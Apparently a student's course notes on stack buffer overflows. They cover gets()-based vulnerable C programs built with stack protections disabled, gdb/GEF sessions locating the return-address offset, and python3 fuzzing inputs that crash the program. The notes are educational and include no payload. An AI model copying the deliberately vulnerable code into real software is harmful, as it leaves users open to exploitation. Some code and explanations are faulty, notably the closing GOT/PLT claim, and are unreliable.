BUFFER OVERFLOWS
identifies whether a vulnerability exists in programs and exploiting those vulnerabilities
VULNERABLE C FUNCTIONS
these functions have no bounds checking. these functions will consume, create & write data until a null terminating string is encountered
strcpy(), strcat(), strpringf(), vsprintf(), gets(), scanf()
SECURE C FUNCTIONS (ALTERNATIVES)
strncpy(), strncat(), snprintf(), fgets()
SAMPLE VULNERABLE PROGRAM FLOW
int main()
{
//function prototype
void vulnFunc();
//greet our Trojan friends
printf("Hello, DSU!\n");
//do something interesting
vulnFunc();
//close
return 0;
//function implementation
void vulnFunc(){
//local variables
int a = 1;
int b = 20;
int c = 123;
char buffer [8];
//get user input, print it
gets(buffer) //the gets() will not pay any attention to the "8" character buffer limit and will accept input until a null terminator is encountered
//gets() does not know or care about how
//big buffer is.It reads characters until
//it sees a newline (\n) or EOF, and then
//adds a null terminator (\0) — even if
//the input is longer than the buffer. This
//causes a buffer overflow, which can
//Corrupt memory,Crash programs, Be
//exploited for code execution (classic vuln)
//the function header
printf("%s\n", buffer);
return;
}
}
SIMPLE BUFFER OVERFLOW PROGRAM
//gcc -g -fno-stack-protector -z execstack 27_stack_overflow.c -o 27_stack_overflow.out
//gcc -g -m32 -fno-stack-protector -z execstack 27_stack_overflow.c -o 27_stack_overflow.out
#include <stdio.h>
#include <stdlib.h>
void echo(void){
printf("Enter some text:\n");
char buffer[16]; //16 byte buffer stored on the stack
gets(buffer); //retrieve user input and store in the buffer
printf("%s\n", buffer); //print out the user input as string
return;
}
void main(void)
{
echo();
exit(0);
}
* the -g will add debugging symbols to the binary to make it easier to analyze
* the -m32 will compile for 32-bit architecture, even on a 64-bit system.
- this is important because stack overflows behave differently in 32-bit vs
64-bit.
- this requires gcc-multilib package installed on some systems.
* the -fno-stack-protector disables stack canaries (a security feature).
- normally, stack canaries help detect and prevent buffer overflows.
- this flag removes that protection, making the binary vulnerable to stack
overflow exploits.
* the -z execstack marks the stack as executable.
- by default, modern systems mark the stack as non-executable (NX bit) to
prevent shellcode from running.
- this flag disables that protection, allowing shellcode to be executed from the
stack.
root@dev:~$ ./27_stack_overflow.out
Enter some text:
AAAABBBBCCCCDDDD
* expected 16 character input
- nothing will happen as nothing critically important is overwritten to the program
root@dev:~$ ./27_stack_overflow.out
Enter some text:
AAAABBBBCCCCDDDDE
* unexpected 17 character input on a 16 character boundary
- nothing will happen as nothing critically important is overwritten to the program
root@dev:~$ ./27_stack_overflow.out
Enter some text:
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII
Segmentation fault (core dumped)
* over the bounds input on a 16 character limit
- important data in the program has been overwritten as specified by the segmentation fault
EXPLOITATION
STEP 1: CODE REVIEW (IF SOURCES ARE AVAILBLE)
STEP 2: DEBUGGING (IF SOURCES AREN'T AVAILABLE)
this method requires determining how many characters will break the program
root@dev:~$ gdb ./27_stack_overflow.out
...
#step 1: identify function locations & vulnerable functions
gef> info func
All defined functions
File 27_stack_overflow
7: voic echo(void)
17: void main(void)
Non-debugging symbols
...
0x00001000 _init
0x00001030 gets@plt //get is a vulnerable function
...
* @plt impacts the number of characters that can be entered
#step 2: place breakpoint
gef> b *echo
breakpoint 1 at 0x11b9: file 27_stack_overflow.c, line 8
#step 3: run the program until the breakpoint is hit
gef> r
...
* r runs the program until a breakpoint is hit
#step 4: disassemble & identify important function calls
gef> d
...
0x565561d5 <+28>: call 0x56556040 <puts@plt>
...
0x565561e0 <+39>: lea eax, [ebp-0x18]
0x565561e3 <+42>: push eax
//working backwards from gets@plt, the I see "push eax" and above it I see lea eax,[ebp-0x18]
//without looking at the source, this could be where the value entered by the user will be stored
//if this is an array, then this will be the address of the 1st element
0x565561e4 <+43>: call 0x56556030 <gets@plt> //this is a vulnerable function
...
* d disassemble the encountered breakpoint
- this will display the important calls being made by the function
#step 5: set breakpoint at where the user input is stored
gef> b *0x565561e3
gef> r
gef> d
gef> c
0x565561e0 <+39>: lea eax, [ebp-0x18]
*-> 0x565561e3 <+42>: push eax
#step 6: fill in the important values to reduce guess work
root@dev:~$ cd ../resources
root@dev:~$ xdg-open bof-calc.xlsx
...
OFFSET ADDRESS ESP(X) VALUE DESCRIPTION
EBP+4 FFFFD12C Return Address
EBP FFFFD128
...
EBP-0x18 FFFFD110 Buffer[16]
EBP-0x24 FFFFD104 X Take note of the ESP as this is where I'd like to overwrite with shellcode
* these entries can be gathered from the step 5 disassembly
gef> c
Continuing
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII
Program received signal SIGSEGV, Segmentation fault.
0x48484848 in ?? ()
Register Section...
$EAX : 0x25
$EBX : 0x46464646 ("FFFF"?)
...
$ESP : 0xFFFFD130 -> "IIII"
$EBP : 0x47474747 ("GGGG"?)
...
$EIP : 0x48484848 ("HHHH"?)
root@dev:~$ xdg-open bof-calc.xlsx
...
OFFSET ADDRESS ESP(X) VALUE DESCRIPTION
EBP+8 FFFFD130 IIII
EBP+4 FFFFD12C HHHH Return Address
EBP FFFFD128 GGGG
EBP-0x4 FFFFD124 FFFF
EBP-0x8 FFFFD120 EEEE
EBP-0xC FFFFD11C DDDD
EBP-0x10 FFFFD118 CCCC
EBP-0x14 FFFFD114 BBBB
EBP-0x18 FFFFD110 AAAA Buffer[16]
EBP-0x24 FFFFD104 X //this was the previous assumption and can now be ignored
* the bof-calc.xlsx created by DSU Professor Dr. Ham can easily tell you which
memory address and how much is required to overflow the EIP
- in this specific example, 32 bytes is required
- 32 bytes from AAAA is at location EBP+4 FFFFD12C HHHH
- if I overwrite the return address "EBP+4" with a shell code,
the return address will be pop off the stack and will be given to EIP
to execute
#step 7: set breakpoint after the call to gets
gef> b *echo+48
Breakpoint 3 at 0x565561e9: file 27_stack_overflow.c, line 11
#display all breakpoints
gef> i b
...
#disable breakpoints already analyzed
gef> disable 1
gef> disable 2
gef> c
Continuing
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII
STACK
...
0xffffd100|+0x0000: 0xffffd110 -> "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII" <- $esp
#dump the stack memory at this location to determine where the buffer trully lives
gef> x /8xw 0xffffd110
0xffffd110: 0x41414141 (A's) 0x42424242 (B's) 0x43434343 (C's) 0x44444444 (D's)
0xffffd120: 0x45454545 (E's) 0x46464646 (F's) 0x47474747 (G's) 0x48484848 (H's)
#do a single instruction step
gef> si
gef> si
gef> si
gef> si
gef> d
...
#step over the puts
gef> s
gef> si
gef> si
-> 0x56561ff <echo+70> leave
gef> s or si
gef> s or si
...
Register section
$eip : 0x48484848 ("HHHH"?)
...
Stack section
...
0xffffd130|+0x0000: "IIII" <-$esp
...
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x48484848
gef> c
* segmentation fault reached
#next step: determine how many exactly must be entered
#can less be entered...find out
#knowing the spacific amount of buffer space available is beneficial skill to have
#when you're trying to develop an exploit/payload for a very small specific piece of memory
#FUZZ
root@dev:~$ python3 -c "print('A' * 16)" | ./27_stack_overflow.out
Enter some text:
AAAAAAAAAAAAAAAA
root@dev:~$ python3 -c "print('A' * 20)" | ./27_stack_overflow.out
Enter some text:
AAAAAAAAAAAAAAAAAAAA
#since this is a x86 program, fuzz 4-bytes at a time
root@dev:~$ python3 -c "print('A' * 24)" | ./27_stack_overflow.out
Enter some text:
AAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
* it looks like somewhere before the EBP and before the return address (EIP)
is really important to the program and modifying it causes the program to
crash and produce "segmentation fault"
root@dev:~$ python3 -c "print('A' * 21)" | ./27_stack_overflow.out
Enter some text:
AAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
* 21 is the magic number where the program will crash
* the gets() reads a line from stdin stream and stores it in buffer. the line
consists of all characters up to and including the first newline character \n.
gets then replaces the newline character with a null character \0 before
returning the line
- if you typed in 20 characters in this sample, gets() actually saves 21 characters
because of the newline
- in the above fuzzing when the program crashes at 21, its actually 22 characters
being entered into memory; this includes the null char which is 22nd
- the REAL reason why the program is blowing up and crashing is because
an important memory section the GOT/PLT is being overwritten with data!
GOT hooking - brief...if you know that the GOT contains the address of functions that we need to rely upon that are linked, can you change the addresses on the lookup table and have them point to something that the adversary can control or add different functionality there!
the GOT & PLT are used in dynamic linking
UNDERSTANDING THE PROGRAM CRASH
Last updated